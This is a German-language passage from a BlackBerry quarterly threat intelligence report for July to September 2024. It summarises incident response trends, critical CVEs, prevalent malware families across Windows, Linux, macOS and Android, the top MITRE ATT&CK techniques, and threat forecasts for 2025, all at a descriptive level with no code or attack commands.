Das BlackBerry Incident Response (IR)-Team bietet Unternehmen, die von einem Malware-Angriff oder einer vermuteten Datenverletzung betroffen sind, Abhilfe. In diesem Quartal verzeichnete unser IR-Team eine Zunahme von Angriffen auf mit dem Internet verbundene Dienste und den Missbrauch von Anmeldedaten ehemaliger Mitarbeiter.

Geräte mit Internetzugang, wie z. B. VPN-Geräte, waren in diesem Quartal stärker als sonst betroffen. Leider sind diese Arten von Geräten möglicherweise nicht ausreichend mit einer Multi-Faktor-Authentifizierung gesichert. In einigen Fällen hat dieses Fehlen von MFA es Bedrohungsakteuren ermöglicht, Ransomware oder andere Malware in der Umgebung eines Kunden zu installieren und Unternehmensdaten zu exfiltrieren. Dies unterstreicht die Notwendigkeit für Unternehmen, alle dem Internet ausgesetzten Systeme rechtzeitig ordnungsgemäß abzusichern(MITRE - External Remote Services) und die Angriffsfläche wenn möglich zu reduzieren, indem sie moderne Alternativen wie Zero Trust Network Access (ZTNA) Lösungen verwenden.

Der Missbrauch von Zugangsdaten ehemaliger Mitarbeiter ist eine weitere häufige Masche. Zwar sollten die Anmeldedaten der Mitarbeiter gelöscht werden, sobald sie das Unternehmen verlassen, doch geschieht dies nicht immer. Alte Konten können einem Bedrohungsakteur potenziell vollen Zugang zum Netzwerk und den Systemen des Unternehmens verschaffen. Dies unterstreicht die Notwendigkeit für Unternehmen, starke Authentifizierungssicherheitskontrollen auf allen Systemen zu implementieren(MITRE - Valid Accounts).

Allgemeine Schwachstellen und Gefährdungen

Auswirkungen und Statistiken

Das CVE-System (Common Vulnerabilities and Exposures - Gemeinsame Schwachstellen und Gefährdungen) bietet einen Rahmen für die Identifizierung, Standardisierung und Veröffentlichung von bekannten Sicherheitsschwachstellen und Gefährdungen. Von Juli bis September 2024 meldete das National Institute of Standards and Technology (NIST) 8.659 neue CVEs.

Obwohl in diesem Quartal weniger CVEs entdeckt wurden als im letzten, ist der Schweregrad dieser CVEs deutlich gestiegen. Im letzten Quartal hatten 8 % der CVEs einen Schweregrad von 9,0 oder höher, während der Prozentsatz in diesem Quartal auf einen neuen Höchststand von 14 % gestiegen ist.

Abbildung 18: CVE-Bewertung Juli - September 2024.

Die kritischsten CVEs in diesem Quartal:

CVE-2024-4879 (9.3 Kritisch) Beliebige Codeausführung: Diese ServiceNow-Schwachstelle ermöglicht es nicht authentifizierten Benutzern, Code innerhalb der Now Platform aus der Ferne auszuführen. Es handelt sich um eine Jelly Template Injection-Schwachstelle, diedie UI-Makros von ServiceNow ausnutzt. Diese Sicherheitsanfälligkeit kann potenziell mit CVE-2024-5178 (6.9 Medium) Unauthorized Access und CVE-2024-5217 (9.2 Critical) Arbitrary Code Execution verkettet werden, wodurch eine unautorisierte Remotecodeausführung auf ServiceNow MID-Servern ermöglicht wird.

CVE-2024-43491 (9.8 Kritisch) Willkürliche Codeausführung: Diese Sicherheitsanfälligkeit, die den Microsoft Service Stack betrifft, führt zuvor entschärfte Sicherheitslücken in Windows 10 wieder ein. Sie ermöglicht Remotecodeausführung ohne Benutzerinteraktion, was zu einer vollständigen Kompromittierung des Systems führen kann. Sowohl ein Service Stack-Update als auch ein Windows-Sicherheitsupdate wurden veröffentlicht, um diese Sicherheitslücke zu schließen.

CVE-2024-38194 (9.9 Kritisch) Umgehung der Authentifizierung: Diese Schwachstelle entsteht durch eine unsachgemäße Autorisierung innerhalb von Azure-Webanwendungen, die es einem authentifizierten Angreifer ermöglicht, seine Berechtigungen über ein Netzwerk zu erweitern. Wird diese Schwachstelle ausgenutzt, kann sie die Sicherheit der Anwendungen und der angeschlossenen Systeme gefährden, was zu unbefugtem Datenzugriff, Unterbrechung von Diensten oder böswilliger Änderung des Anwendungsverhaltens führen kann.

CVE-2024-21416 (9.8 Kritisch) Willkürliche Codeausführung: Im Zusammenhang mit einer Windows-TCP/IP-Schwachstelle (Remote Code Execution, RCE) könnte diese Ausnutzung Angreifern ermöglichen, beliebigen Code auf dem Zielsystem auszuführen und möglicherweise vollständigen Zugriff zu erlangen.

CVE-2024-47575 (9.8 Kritisch) Umgehung der Authentifizierung: Die als "FortiJump" bekannte und als CVE-2024-47575 verfolgte Schwachstelle wurde kurz nach dem Berichtszeitraum bekannt gegeben und beinhaltet Zero-Day-Angriffe des neu entdeckten Bedrohungsakteurs UNC5820. Er missbraucht eine Schwachstelle zur Ausführung von API-Befehlen, die es Angreifern ermöglicht, die Authentifizierung zu umgehen und Befehle auf angreifbaren Systemen auszuführen. Im Fortinet-Advisory vom Oktober heißt es, dass diese Schwachstelle "einem entfernten, nicht authentifizierten Angreifer die Ausführung von beliebigem Code oder Befehlen über speziell gestaltete Anfragen ermöglichen kann".

Vorherrschende Bedrohungen nach Plattform: Windows

FakeUpdates/SocGholish

Downloader

JavaScript-basierter Downloader, der den Benutzern gefälschte Browser-Updates präsentiert. Es ist bekannt, dass er zusätzliche Nutzlasten wie AZORult, GootLoader und RedLine herunterlädt.

Formbuch/xLoader

Infostealer    

Hochentwickelte Malware, die sowohl als Infostealer als auch als Downloader fungiert. Setzt Anti-VM-Techniken, Prozessinjektion und benutzerdefinierte Verschlüsselungsroutinen ein, um die Cybersicherheitsabwehr zu umgehen. Stehlen von Daten aus Browsern, E-Mail-Clients und verschiedenen Anwendungen.

QakBot

Botnet/Dropper

Erstmals 2008 entdeckt, jetzt in Version 5.0. Bietet umfangreiche Möglichkeiten für die Datenexfiltration und laterale Bewegungen. Bekannt dafür, dass er nach der Installation mehrere Malware-Typen ausliefert.

Agent Tesla

Infostealer

.NET-basierter Infostealer, der als MaaS verkauft wird und in erster Linie zum Sammeln von Anmeldedaten dient. Obwohl die Infrastruktur des FBI/DOJ 2023 abgeschaltet wurde, ist er mit neuen Persistenzmechanismen wieder aufgetaucht, um die Wiederherstellung des Hosts zu überleben.

njRAT

Fernzugriff-Trojaner

RAT konzentrierte sich auf die Erfassung von Benutzerdaten und verfügte über Funktionen wie Kamerazugriff, Diebstahl von Anmeldeinformationen, Überwachung von Dateiinteraktionen und Protokollierung von Tastatureingaben.

AsyncRAT

Fernzugriff-Trojaner

Wird in der Regel zusammen mit anderer Malware verbreitet. Empfängt C2-Server-Befehle, um Benutzerdaten zu erfassen und bestimmte Prozesse zu beenden. Verfügt über Botnet-Fähigkeiten.

LummaC2

Infostealer

C-basierter Infostealer, der es auf kommerzielle Unternehmen und kritische Infrastrukturorganisationen abgesehen hat. Konzentriert sich auf die Exfiltration sensibler Daten und wird über Untergrundforen und Telegram-Gruppen verbreitet.

Remcos

Fernzugriff-Trojaner

Fernsteuerungs- und Überwachungsanwendung für unbefugten Fernzugriff und Gerätesteuerung.

RedLine

Infostealer

Nutzt verschiedene Anwendungen und Dienste, um die Daten der Opfer zu exfiltrieren, darunter Kreditkarteninformationen, Passwörter und Cookies.

Phorpiex

Botnetz

Botnet, das sich auf die Verbreitung von Malware spezialisiert hat und für seine Beteiligung an Erpressungskampagnen im X-Rating-Bereich bekannt ist.

Vorherrschende Bedrohungen nach Plattform: Linux

Mirai

Botnetz

Die neueste Version nutzt Zero-Day-Schwachstellen in CCTV-Kameras aus und ist weiterhin sehr aktiv. Die "Corona"-Variante verbreitet sich durch Einspeisung von Schadcode in kompromittierte Kameras.

Gafgyt/Bashlit

Botnetz

IoT-fokussiertes Linux-Botnet, das C2-Server für groß angelegte DDoS-Angriffe nutzt. Die neueste Version zielt auf schwache SSH-Passwörter für GPU-Krypto-Mining ab.

Ransomware spielen

Ransomware

Neue Variante, die speziell auf ESXi-Umgebungen abzielt. Dies ist die erste Ausweitung der Gruppe auf Linux-Systeme im Vergleich zu ihren früheren, auf Windows ausgerichteten Doppelerpressungsangriffen. Verschlüsselt selektiv Dateien in Linux ESXi-Umgebungen.

Hadooken

Botnetz

Neue Linux-Malware, die Krypto-Mining-Funktionen mit DDoS-Angriffstools kombiniert. Zielt auf Schwachstellen in Systemen wie Oracle WebLogic Server ab.

Verbreitete Bedrohungen nach Plattform: macOS

Atomare Stehler (AMOS)

Infostealer

Neue Varianten, die als verschiedene Anwendungen getarnt sind und über DMG-Disk-Images verteilt werden. Ziel sind Passwörter, Browser-Cookies, Autofill-Daten, Krypto-Brieftaschen und Mac-Schlüsselbunddaten.

Chtulu

Infostealer

MaaS-basierter Infostealer, der als Trojaner-DMG verbreitet wird. Zu den Aktivitäten nach der Infektion gehören das Sammeln von Schlüsselbund-Passwörtern, Browser-Cookies, Telegram-Kontoinformationen, Kryptowährungs-Wallets und Benutzerdaten für den C2-Server-Upload.

Macma

Hintertür

Jüngste Updates werden der chinesischen APT-Gruppe Evasive Panda zugeschrieben. Baut Persistenz auf, bevor er Keylogger- und Medienerfassungsfunktionen für die Datenexfiltration auf C2-Server einsetzt.

TodoSwift

Downloader

Verbreitet über PDF-Täuschungen mit Bitcoin-Preisen. Wird der nordkoreanischen Gruppe BlueNoroff zugeschrieben und ist in der Lage, zusätzliche bösartige Binärdateien über C2-Serververbindungen herunterzuladen.

Vorherrschende Bedrohungen nach Plattform: Android

Nekro-Trojaner

Downloader

Verbreitet über den Google Play Store und bösartige Software Development Kits (SDKs). Zu den Funktionen gehören das Starten unsichtbarer Werbung, das Herunterladen zusätzlicher Nutzdaten, die Installation von Anwendungen Dritter, die Ausführung zusätzlichen Codes und die C2-Server-Kommunikation.

Okto2

Infostealer

Verbreitet über trojanisierte Versionen von NordVPN und Google Chrome. Eine Exobot-Variante, die es vor allem auf Bankkontoinformationen abgesehen hat und über Fernzugriffsfunktionen und C2-Server-Kommunikation verfügt.

Ajina

Infostealer

Wird durch Social Engineering und Phishing verbreitet, insbesondere über Telegram. Stehlen von Bankanmeldeinformationen und SMS-Daten, um die 2FA-Authentifizierung von Bankanwendungen abzufangen.

Gemeinsame MITRE-Techniken

Das Verständnis der Techniken von Bedrohungsgruppen auf höchster Ebene kann bei der Entscheidung helfen, welche Erkennungstechniken Priorität haben sollten. BlackBerry beobachtete in diesem Berichtszeitraum die folgenden 20 Techniken, die von Bedrohungsakteuren eingesetzt wurden.

Abbildung 19: Die 20 wichtigsten beobachteten MITRE-Techniken, Juni - September 2024.

Erkannte Techniken

Die folgende Tabelle zeigt die 20 wichtigsten Techniken, die in diesem Quartal von Bedrohungsakteuren eingesetzt wurden. Ein nach oben gerichteter Pfeil (↑) in der Spalte "Veränderung" bedeutet, dass die Nutzung der Technik seit unserem letzten Bericht zugenommen hat. Ein Pfeil nach unten (↓) bedeutet, dass die Nutzung seit unserem letzten Bericht zurückgegangen ist. Ein Gleichheitszeichen (=) zeigt an, dass die Technik im Vergleich zu unserem letzten Bericht unverändert geblieben ist.

Technik Name Technik-ID Taktik Name Letzter Bericht Ändern Sie
Hijack-Ausführungsablauf
T1574
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
1
=
DLL-Seiten-Laden
T1574.002
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
2
=
Virtualisierung/
Sandbox-Umgehung
T1497
Umgehung der Verteidigung, Entdeckung
NA
Suche nach Systeminformationen
T1082
Entdeckung
5
Eingabe-Erfassung
T1056
Zugangsberechtigung, Sammlung
4
Software-Entdeckung
T1518
Entdeckung
6
=
Entdeckung von Sicherheitssoftware
T1518.001
Entdeckung
7
=
Geplanter Task/Job
T1053
Ausführung, Persistenz, Privilegieneskalation
19
DLL-Suchauftrags-Hijacking
T1574.001
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
NA
Prozess Injektion
T1055
Umgehung von Verteidigungsmaßnahmen, Eskalation von Privilegien
3
Maskerade
T1036
Verteidigung Umgehung
10
Prozess Entdeckung
T1057
Entdeckung
8
Systemprozess erstellen oder modifizieren
T1543
Persistenz, Privilegieneskalation
NA
Windows-Dienst
T1543.003
Persistenz, Privilegieneskalation
NA
Boot- oder Logon-AutoStart-Ausführung
T1547
Persistenz, Privilegieneskalation
14
Registry Run Keys/Startup Folder
T1547.001
Persistenz, Privilegieneskalation
15
Suche nach Dateien und Verzeichnissen
T1083
Entdeckung
9
Fernerkundung von Systemen
T1018
Entdeckung
13
Interpreter für Befehle und Skripte
T1059
Ausführung
NA
Verteidigungen beeinträchtigen
T1562
Verteidigung Umgehung
17
Technik-ID
Hijack-Ausführungsablauf
T1574
DLL-Seiten-Laden
T1574.002
Virtualisierung/
Sandbox-Umgehung
T1497
Suche nach Systeminformationen
T1082
Eingabe-Erfassung
T1056
Software-Entdeckung
T1518
Entdeckung von Sicherheitssoftware
T1518.001
Geplanter Task/Job
T1053
DLL-Suchauftrags-Hijacking
T1574.001
Prozess Injektion
T1055
Maskerade
T1036
Prozess Entdeckung
T1057
Systemprozess erstellen oder modifizieren
T1543
Windows-Dienst
T1543.003
Boot- oder Logon-AutoStart-Ausführung
T1547
Registry Run Keys/Startup Folder
T1547.001
Suche nach Dateien und Verzeichnissen
T1083
Fernerkundung von Systemen
T1018
Interpreter für Befehle und Skripte
T1059
Verteidigungen beeinträchtigen
T1562
Taktik Name
Hijack-Ausführungsablauf
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
DLL-Seiten-Laden
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
Virtualisierung/
Sandbox-Umgehung
Umgehung der Verteidigung, Entdeckung
Suche nach Systeminformationen
Entdeckung
Eingabe-Erfassung
Zugangsberechtigung, Sammlung
Software-Entdeckung
Entdeckung
Entdeckung von Sicherheitssoftware
Entdeckung
Geplanter Task/Job
Ausführung, Persistenz, Privilegieneskalation
DLL-Suchauftrags-Hijacking
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
Prozess Injektion
Umgehung von Verteidigungsmaßnahmen, Eskalation von Privilegien
Maskerade
Verteidigung Umgehung
Prozess Entdeckung
Entdeckung
Systemprozess erstellen oder modifizieren
Persistenz, Privilegieneskalation
Windows-Dienst
Persistenz, Privilegieneskalation
Boot- oder Logon-AutoStart-Ausführung
Persistenz, Privilegieneskalation
Registry Run Keys/Startup Folder
Persistenz, Privilegieneskalation
Suche nach Dateien und Verzeichnissen
Entdeckung
Fernerkundung von Systemen
Entdeckung
Interpreter für Befehle und Skripte
Ausführung
Verteidigungen beeinträchtigen
Verteidigung Umgehung
Letzter Bericht
Hijack-Ausführungsablauf
1
DLL-Seiten-Laden
2
Virtualisierung/
Sandbox-Umgehung
NA
Suche nach Systeminformationen
5
Eingabe-Erfassung
4
Software-Entdeckung
6
Entdeckung von Sicherheitssoftware
7
Geplanter Task/Job
19
DLL-Suchauftrags-Hijacking
NA
Prozess Injektion
3
Maskerade
10
Prozess Entdeckung
8
Systemprozess erstellen oder modifizieren
NA
Windows-Dienst
NA
Boot- oder Logon-AutoStart-Ausführung
14
Registry Run Keys/Startup Folder
15
Suche nach Dateien und Verzeichnissen
9
Fernerkundung von Systemen
13
Interpreter für Befehle und Skripte
NA
Verteidigungen beeinträchtigen
17
Ändern Sie
Hijack-Ausführungsablauf
=
DLL-Seiten-Laden
=
Virtualisierung/
Sandbox-Umgehung
Suche nach Systeminformationen
Eingabe-Erfassung
Software-Entdeckung
=
Entdeckung von Sicherheitssoftware
=
Geplanter Task/Job
DLL-Suchauftrags-Hijacking
Prozess Injektion
Maskerade
Prozess Entdeckung
Systemprozess erstellen oder modifizieren
Windows-Dienst
Boot- oder Logon-AutoStart-Ausführung
Registry Run Keys/Startup Folder
Suche nach Dateien und Verzeichnissen
Fernerkundung von Systemen
Interpreter für Befehle und Skripte
Verteidigungen beeinträchtigen

Bekannte Techniken des Gegners

In diesem Quartal erwies sich Hijacking Execution Flow (T1574) als die von Angreifern am häufigsten verwendete Technik, während ihre Untertechnik, DLL Side-Loading (T1574.002), an zweiter Stelle stand. Bei diesen Methoden manipulieren die Angreifer die Art und Weise, wie Betriebssysteme Programme ausführen, z. B. durch Side-Loading von DLLs, häufig zur Umgehung von Sicherheitssystemen.

Bemerkenswert ist auch der Aufstieg der Technik Virtualization/Sandbox Evasion (T1497) unter die ersten drei. Dies deutet darauf hin, dass die von den Angreifern eingesetzte Malware stark auf die Erkennung von Schadprogrammen ausgerichtet war, wie die untersuchten Binärdateien zeigen, die zu diesen Schlussfolgerungen führten.

Erkannte Taktiken

Die drei wichtigsten Taktiken in diesem Quartal sind Defense Evasion, Privilege Escalation und Persistence, wie in Abbildung 20 dargestellt.

 

Abbildung 20: MITRE ATT&CK-Taktiken, Juni - September 2024

Blick nach vorn

Dieser 90-Tage-Bericht, der den Zeitraum von Juli bis September 2024 abdeckt, soll Ihnen helfen, informiert und auf künftige Bedrohungen vorbereitet zu sein. Hochkarätige kriminelle Gruppen, insbesondere Ransomware-Betreiber, nutzen neue Schwachstellen aus und finden Wert in großen und kleinen Zielen. Wie der Bericht feststellt, beobachteten BlackBerry-Forscher allein in diesem Quartal fast zwei Millionen gestoppte Angriffe. Angesichts dieser Aktivitäten ist es wichtig, dass Sie sich über die neuesten Sicherheitsnachrichten für Ihre Branche und Region auf dem Laufenden halten.

Hier erfahren Sie, was Sie in den kommenden Monaten erwarten können:

Telekommunikation unter Beschuss

Der Telekommunikationssektor erwies sich 2024 als ein Hauptziel, wie das Beispiel der AT&T-Verletzung zeigt, bei der Anruf- und Textdaten aus dem gesamten AT&T-Netz abgefangen wurden. Für 2025 erwarten wir, dass Angreifer zunehmend die Telekommunikationsinfrastruktur und nicht mehr einzelne Geräte ins Visier nehmen werden, um die Kommunikation in großem Umfang abzufangen. Der Vorfall auf Salt Typhoon hat gezeigt, wie raffinierte Akteure Schwachstellen auf Netzwerkebene ausnutzen können, um herkömmliche Sicherheitsmaßnahmen zu umgehen. Diese Verlagerung von gerätespezifischer Malware zu Angriffen auf Infrastrukturebene stellt eine große Herausforderung dar, da Unternehmen nun ihren Ansatz zur Sicherung sensibler Kommunikation über öffentliche Telekommunikationsnetze überdenken müssen.

Infodiebe und gestohlene Daten auf Schwarzmärkten

Während des gesamten Jahres 2024 waren Infostealer in unseren vierteljährlichen Berichten über Bedrohungen ein Hauptthema. Berüchtigte Infostealer standen häufig ganz oben auf unseren Listen der Top-Bedrohungen und waren mehrfach an Angriffen auf der ganzen Welt beteiligt. Nach Angaben von Interpol ist der Verkauf von Protokollen, die von Infostealern gesammelt wurden, im Jahr 2023 um 40 % gestiegen. Für das Jahr 2025 wird mit einem weiteren Anstieg gerechnet.

Patchen und Ausnutzen

Die Ausnutzung nicht veröffentlichter oder neu entdeckter Schwachstellen durch Bedrohungsakteure, insbesondere Ransomware-Banden, ist kein neues Phänomen. Die Geschwindigkeit, mit der diese Schwachstellen ausgenutzt werden, macht es für IT-Fachleute jedoch immer schwieriger, mitzuhalten. Dies gilt insbesondere in unserer hypervernetzten Welt mit ihren unzähligen Prozessen, Anwendungen und Diensten. Cyberkriminelle sind sich dessen bewusst und versuchen aktiv, Schwachstellen in der IT-Infrastruktur und Sicherheit eines Unternehmens auszunutzen, um davon zu profitieren.

In diesem Berichtszeitraum wurden über 50 % aller neuen CVEs mit über 7,0 bewertet. Die schnelle Ausnutzung von CVEs und die Bewaffnung von Proof-of-Concepts (PoCs) dürften auch im neuen Jahr eine große Herausforderung für die Branche darstellen.

Ransomware-Neuauflagen und Wiederauftauchen

In den letzten Jahrzehnten haben Strafverfolgungsbehörden und Cybersicherheitsexperten Katz und Maus mit Ransomware-Entwicklern und -Verbündeten gespielt. Wie in unserem Abschnitt über Lynx-Ransomware erwähnt, handelt es sich bei den meisten Gruppen jedoch um Zusammenschlüsse anderer Gruppen, die häufig einen neuen Namen tragen und anderen Ransomware-Code verwenden oder bösartige Code-Basen von anderen Malware-Autoren kaufen. Dieser Trend der Umbenennung, des Wiederauftauchens und der Wiederverwendung von Ransomware wird sich wahrscheinlich fortsetzen, da die Einstiegshürde in die Cyberkriminalität immer niedriger wird.

Nordkoreanische Fernarbeitskräfte und falsche Identitäten

Nordkoreanische Spione haben Berichten zufolge versucht, westliche IT-Unternehmen zu infiltrieren, indem sie sich als Remote-Mitarbeiter ausgaben. Diese Cyberkriminellen legten sorgfältig falsche Identitäten an, wiesen die erforderlichen Fähigkeiten nach, um Bewerbungsgespräche und Tests zu bestehen, und verschleierten ihren Standort, um nicht als Nordkoreaner zu erscheinen. In einigen Fällen verwendeten sie die Deepfake-Technologie. Sobald sie eingestellt waren, versuchten sie, interne Daten zu exfiltrieren und Fernzugriffsprogramme zu installieren.

Wir gehen davon aus, dass dieser Trend zur Fälschung von Identitäten, um Organisationen zu infiltrieren, bis 2025 anhalten wird. Es ist wahrscheinlich, dass Nordkorea noch mehr dieser verdeckten Agenten eingesetzt hat, die noch nicht entdeckt worden sind, und dass sie ihre Taktik wahrscheinlich weiterentwickeln werden, um einer Entdeckung besser zu entgehen.

Besuchen Sie den BlackBerry-Blog und bleiben Sie auf dem Laufenden über die neuesten Cybersecurity-Bedrohungen und -Abwehrmaßnahmen.

Danksagung

Rechtlicher Hinweis

Die im BlackBerry Global Threat Intelligence Report enthaltenen Informationen dienen nur zu Informationszwecken. BlackBerry übernimmt keine Garantie oder Verantwortung für die Richtigkeit, Vollständigkeit und Verlässlichkeit von Aussagen oder Untersuchungen Dritter, auf die hier Bezug genommen wird. Die in diesem Bericht enthaltenen Analysen spiegeln das aktuelle Verständnis der verfügbaren Informationen durch unsere Analysten wider und können sich ändern, wenn uns zusätzliche Informationen bekannt werden. Die Leser sind selbst dafür verantwortlich, diese Informationen mit der gebotenen Sorgfalt auf ihr privates und berufliches Leben anzuwenden. BlackBerry duldet keinen böswilligen Gebrauch oder Missbrauch der in diesem Bericht enthaltenen Informationen.